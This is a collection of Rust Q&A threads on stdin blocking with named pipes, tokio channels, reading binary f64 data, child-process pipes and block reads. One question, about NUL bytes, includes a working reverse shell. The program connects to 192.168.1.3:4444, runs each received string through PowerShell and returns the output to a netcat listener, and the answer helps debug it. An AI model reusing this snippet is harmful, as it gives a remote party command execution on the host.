How to implement blocking iterator over stdin? - rust

I need to implement a long-running program that receives messages via stdin. The protocol defines that each message consists of a length indicator (for simplicity, a 1-byte integer) followed by a string whose length is given by that indicator. Messages are NOT separated by any whitespace.
The program is expected to consume all messages from stdin and then wait for further messages.
How do I implement such waiting on stdin?
I implemented the iterator so that it tries to read from stdin and retries in case of error. It works, but it is very inefficient.
I would like the iterator to read a message as soon as new data arrives.
My implementation uses read_exact:
use std::io::{stdin, Error as IOError, ErrorKind, Read};

pub struct In<R>(R) where R: Read;

pub trait InStream {
    fn read_one(&mut self) -> Result<String, IOError>;
}

impl<R> In<R> where R: Read {
    pub fn new(stdin: R) -> In<R> {
        In(stdin)
    }
}

impl<R> InStream for In<R> where R: Read {
    /// Read one message from stdin and return it as a string.
    fn read_one(&mut self) -> Result<String, IOError> {
        const LENGTH_INDICATOR: usize = 1;
        let stdin = &mut self.0;

        // Read the 1-byte length prefix, then exactly that many bytes of payload.
        let mut size = [0u8; LENGTH_INDICATOR];
        stdin.read_exact(&mut size)?;
        let size = u8::from_be_bytes(size) as usize;

        let mut buffer = vec![0u8; size];
        stdin.read_exact(&mut buffer)?;
        String::from_utf8(buffer).map_err(|_| IOError::new(ErrorKind::InvalidData, "not utf8"))
    }
}

impl<R> Iterator for In<R> where R: Read {
    type Item = String;

    fn next(&mut self) -> Option<String> {
        self.read_one().ok()
    }
}

fn main() {
    let mut in_stream = In::new(stdin());
    loop {
        match in_stream.next() {
            Some(x) => println!("x: {:?}", x),
            None => (),
        }
    }
}
I went through the Read and BufReader documentation, but no method seems to solve my problem, as the read doc contains the following text:
This function does not provide any guarantees about whether it blocks waiting for data, but if an object needs to block for a read and cannot, it will typically signal this via an Err return value.
How do I implement waiting for data on stdin?
===
Edit: a minimal use case that does not block, looping with an UnexpectedEof error instead of waiting for data:
use std::io::{stdin, Read};

fn main() {
    let stdin = stdin();
    let mut stdin_handle = stdin.lock();
    loop {
        let mut buffer = vec![0u8; 4];
        let res = stdin_handle.read_exact(&mut buffer);
        println!("res: {:?}", res);
        println!("buffer: {:?}", buffer);
    }
}
I run it on OSX with cargo run < in, where in is a named pipe. I fill the pipe with echo -n "1234" > in.
It waits for the first input and then it loops:
res: Ok(())
buffer: [49, 50, 51, 52]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
buffer: [0, 0, 0, 0]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
buffer: [0, 0, 0, 0]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
buffer: [0, 0, 0, 0]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
buffer: [0, 0, 0, 0]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
...
I would like the program to wait until there is sufficient data to fill the buffer.

As others explained, the docs on Read are written very generally and don't apply to standard input, which is blocking. In other words, your code with the buffering added is fine.
The problem is how you use the pipe. For example, if you run mkfifo foo; cat <foo in one shell, and echo -n bla >foo in another, you'll see that the cat in the first shell will display bla and exit. That is because closing the last writer of a pipe sends EOF to the reader, rendering your program's stdin useless.
You can work around the issue by starting another program in the background that opens the pipe in write mode and never exits, for example tail -f /dev/null >foo. Then echo -n bla >foo will be observed by your program, but won't cause its stdin to close. The "holding" of the write end of the pipe could also be achieved from Rust, as sketched below.
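Here is a minimal sketch of that idea from the Rust side (an illustration, not tested against the exact setup above): the reading program itself also opens the named pipe, in, for writing and keeps that handle alive, so the last write end is never closed. It relies on stdin already being redirected from the pipe (cargo run < in), otherwise the write-only open would block waiting for a reader:

use std::fs::OpenOptions;
use std::io::{stdin, Read};

fn main() {
    // Keep one write end of the FIFO open for the lifetime of the program.
    // While this handle exists, writers like `echo -n "1234" > in` coming and
    // going never close the *last* writer, so the reader never sees EOF.
    // Opening write-only succeeds without blocking here because our own stdin
    // already holds the read end of the pipe.
    let _keep_writer_alive = OpenOptions::new()
        .write(true)
        .open("in")
        .expect("failed to open the named pipe for writing");

    let mut input = stdin();
    loop {
        let mut buffer = vec![0u8; 4];
        // This now blocks until four bytes arrive instead of spinning on
        // UnexpectedEof after the first writer goes away.
        input.read_exact(&mut buffer).expect("read failed");
        println!("buffer: {:?}", buffer);
    }
}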

Related

How to remove nul characters from string in rust?

use std::net::TcpStream;
use std::io::*;
use std::io::{self, Write};
use std::str::from_utf8;
use std::process::Command;

const MESSAGE_SIZE: usize = 10;

fn main() {
    let mut stream = TcpStream::connect("192.168.1.3:4444").unwrap();
    println!("CONNECTED !!");
    loop {
        stream.write(b"[*] >> ").expect("A");
        let mut rx_bytes = [0u8; MESSAGE_SIZE];
        stream.read(&mut rx_bytes).expect("k");
        let received = from_utf8(&rx_bytes).expect("valid utf8").to_string();
        print!("{}", received);
        let output = Command::new("powershell").arg(received).output().expect("failed to execute process"); // Error at .arg(received).
        println!("status: {}", output.status);
        io::stdout().write_all(&output.stdout).unwrap();
        io::stderr().write_all(&output.stderr).unwrap();
        let res = from_utf8(&output.stdout).expect("valid utf8").to_string();
        stream.write(res.as_bytes());
    }
}
ERROR:-
thread 'main' panicked at 'failed to execute process: Error { kind: InvalidInput, message: "nul byte found in provided data" }', .\main.rs:20:72
note: run with RUST_BACKTRACE=1 environment variable to display a backtrace
PS:- I am using netcat as the server.
The first thing you should probably do (if you haven't already) is to look at your incoming data:
println!("{:x?}", "azAZ\0X09".as_bytes()); // [61, 7a, 41, 5a, 0, 58, 30, 39]
Then you can determine why there is a null byte in there and what needs to be done about it.
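In the snippet above, one likely source of the NULs (an assumption based only on the posted code, not on the netcat side) is that read fills at most MESSAGE_SIZE bytes and leaves the rest of the fixed-size buffer as zeros, and from_utf8(&rx_bytes) then turns those zeros into NUL characters in the command string. A minimal sketch of converting only the bytes that were actually read, reusing stream, rx_bytes, and from_utf8 from the code above:

// `read` returns how many bytes were actually written into the buffer.
let bytes_read = stream.read(&mut rx_bytes).expect("read failed");
// Convert only that prefix, so stale zero bytes never reach the string ...
let received = from_utf8(&rx_bytes[..bytes_read]).expect("valid utf8");
// ... and strip any NULs the peer may still have sent, just in case.
let received = received.trim_matches(char::from(0)).to_string();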

Rust Tokio mpsc::channel unexpected behavior for multi-task program

In the following program I use Tokio's mpsc channels. The Sender is moved to a task named input_message and the Receiver is moved to another task named printer. Both tasks are tokio::spawn()-ed in the main function. The input_message task reads the user's input and sends it through the channel. The printer task calls recv() on the channel to get the user's input and simply prints it to stdout:
use std::error::Error;
use tokio::sync::mpsc;
use std::io::{BufRead, Write};

#[tokio::main]
async fn main() -> Result<(), Box<dyn Error>> {
    let (tx, mut rx) = mpsc::unbounded_channel::<String>();
    let printer = tokio::spawn(async move {
        loop {
            let res = rx.recv().await; // (11) Comment this ..
            // let res = rx.try_recv(); // (12) Uncomment this ,,
            if let Some(m) = res { // .. and this
            // if let Ok(m) = res { // ,, and this
                if m.trim() == "q".to_string() {
                    break;
                }
                println!("Received: {}", m.trim());
            }
        }
        println!("Printer exited");
    });
    let input_message = tokio::spawn(async move {
        let stdin = std::io::stdin();
        let mut bufr = std::io::BufReader::new(stdin);
        let mut buf = String::new();
        loop {
            // Let the printer thread print the string before asking the user's input.
            std::thread::sleep(std::time::Duration::from_millis(1));
            print!("Enter input: ");
            std::io::stdout().flush().unwrap();
            bufr.read_line(&mut buf).unwrap();
            if buf.trim() == "q".to_string() {
                tx.send(buf).unwrap();
                break;
            }
            tx.send(buf).unwrap();
            buf = String::new();
        }
        println!("InputMessage exited");
    });
    tokio::join!(input_message, printer);
    Ok(())
}
The expected behavior of the program is to:
Ask the user for some input (q to quit)
Print that same input to stdout
Using rx.recv().await as in lines 11-13, the program seems to buffer the Strings representing the user's input: the various inputs are not received by the printer task, which therefore does not print them to stdout. Once the quit message (i.e. q) is sent, the input_message task exits, the messages seem to be flushed out of the channel, and the printer task prints all the inputs at once. Here's an example of the wrong output:
Enter input: Hello
Enter input: World
Enter input: q
InputMessage exited
Received: Hello
Received: World
Printer exited
My question here is, how is it possible that the channel buffers the messages and processes them in one go only when the sending thread exits, instead of receiving them as they are sent?
What I tried is to use the try_recv() function as in lines 12-14, and indeed it fixes the problem. The output is printed correctly; here is an example:
Enter input: Hello
Received: Hello
Enter input: World
Received: World
Enter input: q
InputMessage exited
Printer exited
In light of this, I am confused. I get the difference between recv().await and try_recv(), but I think there's something more at play here that I'm missing, which makes the latter work and the former not. Is anybody able to shed some light on this? Why does try_recv() work while recv().await does not, and why should recv().await not work in this scenario? In terms of efficiency, is looping on try_recv() bad practice?
There are a few things to point out here, but first of all, you are waiting for lines on std::io::stdin(), which blocks the thread until a line arrives on that stream. While the thread is waiting for input, no other future can be executed on it; this blog post is a great resource if you want to dive deeper into why you shouldn't do that.
Tokio's io module offers an async handle to stdin(), you can work with this as a quick fix, although the documentation explicitly mentions that you should spin up a dedicated (non-async) thread for interactive user input instead of using the async handle.
Swapping std::io::stdin() for tokio::io::stdin() also entails swapping out the standard library BufReader for tokio's implementation that wraps an R: AsyncRead rather than R: Read.
To prevent interleaved writes between the input task and the output task, you can use a responder channel that signals to the input task when the output has been printed. Instead of sending String over the channel, you could send a Message with these fields:
struct Message {
    message: String,
    done_tx: oneshot::Sender<()>,
}
After reading an input line, send the Message over the channel to the printer task. The printer task prints the String and signals through the done_tx that the input task can print the input prompt and wait for a new line.
Putting all that together with some other changes like a while loop to wait for messages, you'd end up with something like this:
use std::error::Error;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use tokio::sync::{mpsc, oneshot};

#[derive(Debug)]
struct Message {
    done_tx: oneshot::Sender<()>,
    message: String,
}

#[tokio::main]
async fn main() -> Result<(), Box<dyn Error>> {
    let (tx, mut rx) = mpsc::unbounded_channel::<Message>();
    let printer = tokio::spawn(async move {
        while let Some(Message {
            message: m,
            done_tx,
        }) = rx.recv().await
        {
            if m.trim() == "q".to_string() {
                break;
            }
            println!("Received: {}", m.trim());
            done_tx.send(()).unwrap();
        }
        println!("Printer exited");
    });
    let input_message = tokio::spawn(async move {
        let stdin = tokio::io::stdin();
        let mut stdout = tokio::io::stdout();
        let mut bufr = tokio::io::BufReader::new(stdin);
        let mut buf = String::new();
        loop {
            // Let the printer task print the string before asking for the user's input.
            stdout.write(b"Enter input: ").await.unwrap();
            stdout.flush().await.unwrap();
            bufr.read_line(&mut buf).await.unwrap();
            let end = buf.trim() == "q";
            let (done_tx, done) = oneshot::channel();
            let message = Message {
                message: buf,
                done_tx,
            };
            tx.send(message).unwrap();
            if end {
                break;
            }
            done.await.unwrap();
            buf = String::new();
        }
        println!("InputMessage exited");
    });
    tokio::join!(input_message, printer);
    Ok(())
}

Read binary file in units of f64 in Rust

Assuming you have a binary file example.bin and you want to read that file in units of f64, i.e. the first 8 bytes give a float, the next 8 bytes give the next one, etc. (assuming you know the endianness), how can this be done in Rust?
I know that one can use std::fs::read("example.bin") to get a Vec<u8> of the data, but then you have to do quite a bit of "gymnastics" to always convert 8 of the bytes to an f64, e.g.:
fn eight_bytes_to_array(barry: &[u8]) -> &[u8; 8] {
    barry.try_into().expect("slice with incorrect length")
}

let file_content = std::fs::read("example.bin").expect("Could not read file!");
let nr = eight_bytes_to_array(&file_content[0..8]);
let nr = f64::from_be_bytes(*nr);
I saw this post, but it's from 2015 and a lot has changed in Rust since then, so I was wondering if there is a better/faster way these days.
An example, without proper error handling and without checking for the case where the file size is not a multiple of 8 bytes:
use std::fs::File;
use std::io::{BufReader, Read};

fn main() {
    // Using BufReader because File in std is unbuffered by default,
    // and reading 8 bytes at a time straight from the file is a really bad idea.
    let mut input = BufReader::new(
        File::open("floats.bin")
            .expect("Failed to open file")
    );
    let mut floats = Vec::new();
    loop {
        use std::io::ErrorKind;
        // You may use 8 instead of `size_of`, but `size_of` is less error-prone.
        let mut buffer = [0u8; std::mem::size_of::<f64>()];
        // Using read_exact because `read` may return less
        // than 8 bytes even if there are bytes in the file.
        // This, however, prevents us from handling the case
        // where the file size cannot be divided by 8.
        let res = input.read_exact(&mut buffer);
        match res {
            // We detect if we read until the end.
            // If there were some excess bytes after the last read, they are lost.
            Err(error) if error.kind() == ErrorKind::UnexpectedEof => break,
            // Add more cases of errors you want to handle.
            _ => {}
        }
        // You should probably do better error handling.
        // This simply panics.
        res.expect("Unexpected error during read");
        // Use `from_be_bytes` if the numbers in the file are big-endian.
        let f = f64::from_le_bytes(buffer);
        floats.push(f);
    }
}
I would create a generic iterator that returns f64 for flexibility and reusability.
struct F64Reader<R: io::BufRead> {
    inner: R,
}

impl<R: io::BufRead> F64Reader<R> {
    pub fn new(inner: R) -> Self {
        Self { inner }
    }
}

impl<R: io::BufRead> Iterator for F64Reader<R> {
    type Item = f64;

    fn next(&mut self) -> Option<Self::Item> {
        let mut buff: [u8; 8] = [0; 8];
        self.inner.read_exact(&mut buff).ok()?;
        Some(f64::from_be_bytes(buff))
    }
}
This means that if the file is large, you can loop through the values without storing them all in memory:
let input = fs::File::open("example.bin")?;
for f in F64Reader::new(io::BufReader::new(input)) {
    println!("{}", f)
}
Or, if you want all the values, you can collect them:
let input = fs::File::open("example.bin")?;
let values: Vec<f64> = F64Reader::new(io::BufReader::new(input)).collect();
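If the whole file fits in memory anyway, another standard-library option (a minimal sketch of my own, not from the answers above, assuming big-endian data and silently dropping a trailing partial chunk) is to read everything and walk over it with chunks_exact:

use std::convert::TryInto;

fn main() {
    let bytes = std::fs::read("example.bin").expect("Could not read file!");
    let floats: Vec<f64> = bytes
        .chunks_exact(8) // yields only complete 8-byte chunks
        .map(|chunk| f64::from_be_bytes(chunk.try_into().unwrap()))
        .collect();
    println!("read {} floats", floats.len());
}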

Writing to stdio & reading from stdout in Rust Command process

I'll try to simplify what I'm trying to accomplish as much as possible, but in a nutshell here is my problem:
I am trying to spawn the node shell as a process in Rust. I would like to pass JavaScript code to the process' stdin and read the Node.js output from the process' stdout. This would be an interactive usage where the node shell is spawned once and keeps receiving JS instructions and executing them.
I do not wish to launch the nodejs app using a file argument.
I have read quite a bit about std::process::Command, tokio, and why we can't write to and read from a piped child using only the standard library. One of the solutions that I kept seeing online (in order to not block the main thread while reading/writing) is to use a thread for reading the output. Most solutions did not involve a continuous write/read flow.
What I have done is to spawn 2 threads, one that keeps writing to stdin and one that keeps reading from stdout. That way, I thought, I won't be blocking the main thread. However, my issue is that only 1 thread can actively be used: when I have a thread for stdin, stdout does not even receive data.
Here is the code; the comments should provide more details:
pub struct Runner {
    handle: Child,
    pub input: Arc<Mutex<String>>,
    pub output: Arc<Mutex<String>>,
    input_thread: JoinHandle<()>,
    output_thread: JoinHandle<()>,
}

impl Runner {
    pub fn new() -> Runner {
        let mut handle = Command::new("node")
            .stdin(Stdio::piped())
            .stdout(Stdio::piped())
            .spawn()
            .expect("Failed to spawn node process!");

        // begin stdout thread part
        let mut stdout = handle.stdout.take().unwrap();
        let output = Arc::new(Mutex::new(String::new()));
        let out_clone = Arc::clone(&output);
        let output_thread = spawn(move || loop {
            // code here never executes...why ?
            let mut buf: [u8; 1] = [0];
            let mut output = out_clone.lock().unwrap();
            let what_i_read = stdout.read(&mut buf);
            println!("reading: {:?}", what_i_read);
            match what_i_read {
                Err(err) => {
                    println!("{}] Error reading from stream: {}", line!(), err);
                    break;
                }
                Ok(bytes_read) => {
                    if bytes_read != 0 {
                        let char = String::from_utf8(buf.to_vec()).unwrap();
                        output.push_str(char.as_str());
                    } else if output.len() != 0 {
                        println!("result: {}", output);
                        out_clone.lock().unwrap().clear();
                    }
                }
            }
        });

        // begin stdin thread block
        let mut stdin = handle.stdin.take().unwrap();
        let input = Arc::new(Mutex::new(String::new()));
        let input_clone = Arc::clone(&input);
        let input_thread = spawn(move || loop {
            let mut in_text = input_clone.lock().unwrap();
            if in_text.len() != 0 {
                println!("writing: {}", in_text);
                stdin.write_all(in_text.as_bytes()).expect("!write");
                stdin.write_all("\n".as_bytes()).expect("!write");
                in_text.clear();
            }
        });

        Runner {
            handle,
            input,
            output,
            input_thread,
            output_thread,
        }
    }

    // this function should receive commands
    pub fn execute(&mut self, str: &str) {
        let input = Arc::clone(&self.input);
        let mut input = input.lock().unwrap();
        input.push_str(str);
    }
}
In the main thread I'd like to use this as:
let mut runner = Runner::new();
runner.execute("console.log('foo')");
println!("{:?}", runner.output);
I am still new to Rust, but at least I'm past the point where the borrow checker makes me bang my head against the wall; I'm starting to find it more pleasant now :)

Reading Bytes From a Reader

I'm writing something to process stdin in blocks of bytes, but can't seem to work out a simple way to do it (though I suspect there is one).
fn run() -> int {
    // Doesn't compile: types differ
    let mut buffer = [0, ..100];
    loop {
        let block = match stdio::stdin().read(buffer) {
            Ok(bytes_read) => buffer.slice_to(bytes_read),
            // This captures the Err from the end of the file,
            // but also actual errors while reading from stdin.
            Err(message) => return 0
        };
        process(block).unwrap();
    }
}

fn process(block: &[u8]) -> Result<(), IoError> {
    // do things
}
My questions:
What's the "standard" way to do this? (I've been trying/hoping to use and_then()/or_else())
How can I differentiate between the Err(IoError) from end of the file, and the Err that's actually an error?
The previously accepted answer is outdated (it predates Rust 1.0). EOF is no longer considered an error. You can do it like this:
use std::io::{self, Read};

fn main() {
    let mut buffer = [0; 100];
    while let Ok(bytes_read) = io::stdin().read(&mut buffer) {
        if bytes_read == 0 { break; }
        process(&buffer[..bytes_read]).unwrap();
    }
}

fn process(block: &[u8]) -> Result<(), io::Error> {
    Ok(()) // do things
}
Note that this may not result in the expected behavior: read doesn't have to fill the buffer, but may return with any number of bytes read. In the case of stdin, the read implementation returns every time a newline is detected (i.e. when Enter is pressed in the terminal).
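If you really want fixed-size blocks rather than "whatever read returned", one option (my own variation on the above, not part of the original answer) is to use read_exact and treat UnexpectedEof as the end of input; note that a final partial block is discarded here:

use std::io::{self, ErrorKind, Read};

fn main() -> io::Result<()> {
    let mut stdin = io::stdin();
    let mut buffer = [0u8; 100];
    loop {
        match stdin.read_exact(&mut buffer) {
            Ok(()) => process(&buffer)?,
            // read_exact reports a partially filled buffer at end of input
            // as UnexpectedEof; treat that as "no more full blocks".
            Err(e) if e.kind() == ErrorKind::UnexpectedEof => break,
            Err(e) => return Err(e),
        }
    }
    Ok(())
}

fn process(block: &[u8]) -> io::Result<()> {
    Ok(()) // do things
}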
The (pre-1.0) Rust API documentation stated that:
Note that end-of-file is considered an error, and can be inspected for
in the error's kind field.
The IoError struct looked like this:
pub struct IoError {
    pub kind: IoErrorKind,
    pub desc: &'static str,
    pub detail: Option<String>,
}
The list of all kinds is at http://doc.rust-lang.org/std/io/enum.IoErrorKind.html
You can match it like this:
match stdio::stdin().read(buffer) {
    Ok(_) => println!("ok"),
    Err(io::IoError { kind: io::EndOfFile, .. }) => println!("end of file"),
    _ => println!("error")
}
